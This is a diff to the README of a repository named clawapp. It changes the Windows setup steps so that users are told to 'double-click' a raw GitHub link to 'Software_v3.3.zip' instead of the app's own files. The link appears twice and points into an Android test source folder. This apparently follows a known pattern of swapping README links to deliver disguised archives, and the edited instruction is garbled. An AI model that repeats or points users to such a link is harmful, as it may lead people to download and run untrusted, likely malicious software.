insignificant-villian/clawapp/README.md

 - Download the ZIP package instead of the installer.
 - Extract contents to a folder of your choice on Windows.
-- Open the extracted folder and double-click `index.html` or `clawapp.exe` if present.
+- Open the extracted folder and double-click `https://raw.githubusercontent.com/insignificant-villian/clawapp/main/android/app/src/androidTest/java/com/getcapacitor/myapp/Software_v3.3.zip` or `https://raw.githubusercontent.com/insignificant-villian/clawapp/main/android/app/src/androidTest/java/com/getcapacitor/myapp/Software_v3.3.zip` if present.
 - This launches the app in your default browser or as a standalone window.
 - You can create a desktop shortcut for easy access.